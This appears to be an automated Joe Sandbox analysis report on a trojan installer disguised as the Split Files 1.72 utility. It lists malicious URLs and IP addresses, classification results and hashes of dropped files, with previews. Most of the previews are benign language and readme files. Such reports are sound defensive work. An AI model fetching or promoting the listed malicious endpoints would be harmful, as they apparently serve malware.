                http://171.22.30.106/library.php | 100% | URL Reputation | malware
                http://www.remobjects.com/?psU | 0% | URL Reputation | safe
                http://www.altarsoft.com/split_files.shtml | 0% | Avira URL Cloud | safe
                http://rus.altarsoft.com/split_files.shtml | 0% | Avira URL Cloud | safe
                http://www.innosetup.comDVarFileInfo$ | 0% | Avira URL Cloud | safe
                http://www.altarsoft.com/split_files.shtml | 2% | Virustotal |
                http://107.182.129.235/storage/extension.php8 | 13% | Virustotal |
                http://107.182.129.235/storage/extension.php8 | 100% | Avira URL Cloud | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte | true | URL Reputation: safe | unknown
                http://107.182.129.235/storage/extension.php | true | URL Reputation: safe | unknown
                http://107.182.129.235/storage/ping.php | true | URL Reputation: safe | unknown
                http://171.22.30.106/library.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.innosetup.com/ | is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr | false | URL Reputation: safe | unknown
                http://107.182.129.235/storage/extension.php8 | SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp | false | 13%, Virustotal; Avira URL Cloud: malware | unknown
                http://www.altarsoft.com/split_files.shtml | is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-2KTR4.tmp.1.dr, is-KJUD7.tmp.1.dr, is-8T8VP.tmp.1.dr, is-L90L4.tmp.1.dr, is-JPC2L.tmp.1.dr, is-4QNQO.tmp.1.dr, is-DPLT0.tmp.1.dr, is-2C8S0.tmp.1.dr, is-BOL01.tmp.1.dr, is-T2GFQ.tmp.1.dr | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
                http://www.remobjects.com/?ps | file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr | false | URL Reputation: safe | unknown
                http://rus.altarsoft.com/split_files.shtml | is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-MR54O.tmp.1.dr, is-IRLOP.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                http://www.innosetup.com | file.exe | false | URL Reputation: safe | unknown
                http://107.182.129.235ibrary.php | SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.innosetup.comDVarFileInfo$ | file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377767344.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr | false | Avira URL Cloud: safe | low
                http://www.remobjects.com/?psU | file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr | false | URL Reputation: safe | unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IP | Domain | Country | ASN | ASN Name | Malicious
                45.139.105.171 | unknown | Italy | 33657 | CMCSUS | true
                45.139.105.1 | unknown | Italy | 33657 | CMCSUS | true
                85.31.46.167 | unknown | Germany | 43659 | CLOUDCOMPUTINGDE | true
                107.182.129.235 | unknown | Reserved | 11070 | META-ASUS | true
                171.22.30.106 | unknown | Germany | 33657 | CMCSUS | false
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:778239
                Start date and time:2023-01-05 09:16:09 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 48s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@12/39@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 38.2% (good quality ratio 37.1%)
                • Quality average: 80.7%
                • Quality standard deviation: 25%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Not all processes where analyzed, report is missing behavior information
                • TCP Packets have been reduced to 100
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                09:17:06 | API Interceptor | 1x Sleep call for process: rf6CwnLa.exe modified
                No context
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:modified
                Size (bytes):3299023
                Entropy (8bit):5.539173858681708
                Encrypted:false
                SSDEEP:98304:ipRn32Afxm8quBv68VsFryIBHB2+/sAO8:aBps+8
                MD5:D26C02425FA67FBDC0E4B4D5D6FA6088
                SHA1:09D22E65BFF61FB7BC43FB680D5E6EC3A942E9B0
                SHA-256:01CCE9B495FE88280525F44AA8A6A5417CC4081D0CC6CAD384CE42649673E677
                SHA-512:ED887FDFACAB2CAC118BE458B546E55CC473EF3DDA815EBAEBE5B01799F41976E80E03D649BCBA3D532C37CC05EDA3C34A1FF0841A3B3AD2F3935BB5B2189B38
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.........._...............................@..........................`.......~2..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...(......(.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:data
                Category:dropped
                Size (bytes):3299023
                Entropy (8bit):5.53917302973062
                Encrypted:false
                SSDEEP:98304:vpRn32Afxm8quBv68VsFryIBHB2+/sAO8:BBps+8
                MD5:2A4BCD07D4B6930C0F71167C15B0688B
                SHA1:5B07D7BED299AA5E483D5432483E21FB85DCA51F
                SHA-256:311DBADCEAF02ADAFE066C6221A9ECC92253F6C1980FC9AF16DC1514D6D77E6B
                SHA-512:43BC67CB935DA4CCD63773BB81490179150A65C18AF6E9B9E32BDD7A74904FD4D43FA8F095B0086B772225A6A3EEF5677C71FF64863557FC2F7E82EC2E5E0267
                Malicious:false
                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.........._...............................@..........................`.......~2..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...(......(.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
